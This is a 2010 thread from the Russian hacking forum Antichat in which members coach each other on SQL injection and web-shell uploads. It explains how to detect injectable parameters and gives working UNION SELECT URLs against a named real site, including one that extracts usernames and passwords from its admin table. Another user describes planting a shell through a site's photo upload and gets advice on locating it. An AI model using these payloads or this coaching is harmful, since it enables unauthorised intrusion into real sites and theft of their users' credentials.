Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.02.2010, 12:05
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от Seravin
есть сайт site.ru/page.php?id=1. Не могу догнать: когда я подставляю id=1 and 1=2 у меня открывается страница, как для id=1. Как это получается?
Значит нету там иньекции просто. Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?
Последний раз редактировалось _iks_; 14.02.2010 в 13:38..
|
|
|
14.02.2010, 13:33
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от _iks_
Значит нету там иньекции просто.
Значит там не из базы берет?? или нету инъекции? а если нет инъекции, то какой запрос тогда получается?
|
|
|
|
14.02.2010, 13:48
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u14171/mpomed.ru/www/id1/index.php on line 39
Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?
|
|
|
|
14.02.2010, 13:52
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
CyberHunter, это значит что тебе пора читать статьи, а не постить сюда вопросы которые были заданы овер 9000 раз
|
|
|
|
14.02.2010, 13:53
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от CyberHunter
Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?
Сообщение от jokester
Вопрос №1 Что это? (ну и далее линк , обычно с кавычкой на конце, пройдя по которому можно лицезреть ту или иную ошибку)
Этот вопрос порядком поднадоел и впринципе некорректен, но задаётся с завидной регулярностью
Если выводится ошибка, и в ней присутствует что то по базу/sql/mysql/mssql/PostgreSQL и т.д. или вываливается запрос, или функции вывода из базы, то это ошибка БД, и скорее всего будет возможность провести инъекцию.
НО. Инъекция , это внедрение своего кода в запрос и иногда как раз внедрить его не получится, несмотря на ошибку базы. Как нам это определить. Вот некоторые примеры, которые я надеюсь помогут, и избавят от этого вопроса
site.com/index.php?id=1
Выводит страницу 1
site.com/index.php?id=2-1(Выводит страницу 1)
site.com/index.php?id=2(Выводит страницу 2)
-------------------
site.com/index.php?id=1*1(Выводит страницу 1)
site.com/index.php?id=1*2(Выводит страницу 2)
-------------------
site.com/index.php?id=1+and+1=1(Выводит страницу 1)
site.com/index.php?id=1+and+1=2(Выводит ошибку, или ничего не выводит, вобщем отличается от первого)
-------------------
Если эти примеры работают, то мы имеем SQL инъекцию.
Во так. Я посмотрел сайт, да, там есть иньекция, почитай закреплённые темы
И кстати либо норм линк кидай, либо удаляй имя сайта из пути
http://www.mpomed.ru/id1/?idI=100500+union+select+1,username,3,4,password,6 ,7+from+admin
Последний раз редактировалось _iks_; 14.02.2010 в 14:06..
|
|
|
|
14.02.2010, 13:53
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
есть такоы вопрос..
есть один wаp саыт..у нево есть ммс сервис..и от туда мойно заqрузить фото и я заярузил шелл..
знаю то4но шелл в базе ну не мояу наыти линк..посмoтру своытсву шелл-а там есть линк друяово саыта..
4то зделат ??
|
|
|
|
14.02.2010, 13:58
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
чо?
|
|
|
|
14.02.2010, 14:01
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от CyberHunter
Скажите вот после того как поставил знак ' , появляется такая ошибка. Что это значит?
Код:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7+--
|
|
|
|
14.02.2010, 14:08
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от LokbatanLi
есть такоы вопрос..
есть один wаp саыт..у нево есть ммс сервис..и от туда мойно заqрузить фото и я заярузил шелл..
знаю то4но шелл в базе ну не мояу наыти линк..посмoтру своытсву шелл-а там есть линк друяово саыта..
4то зделат ??
Если я тебя правильно понял, то тебе нужно найти папку в которой хранятся изображения (вместо одного из которых ты загрузил шелл).
|
|
|
|
14.02.2010, 14:11
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от keng
Если я тебя правильно понял, то тебе нужно найти папку в которой хранятся изображения (вместо одного из которых ты загрузил шелл).
Для начала неплохо бы найти инклуд, если расширение как у картинки
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
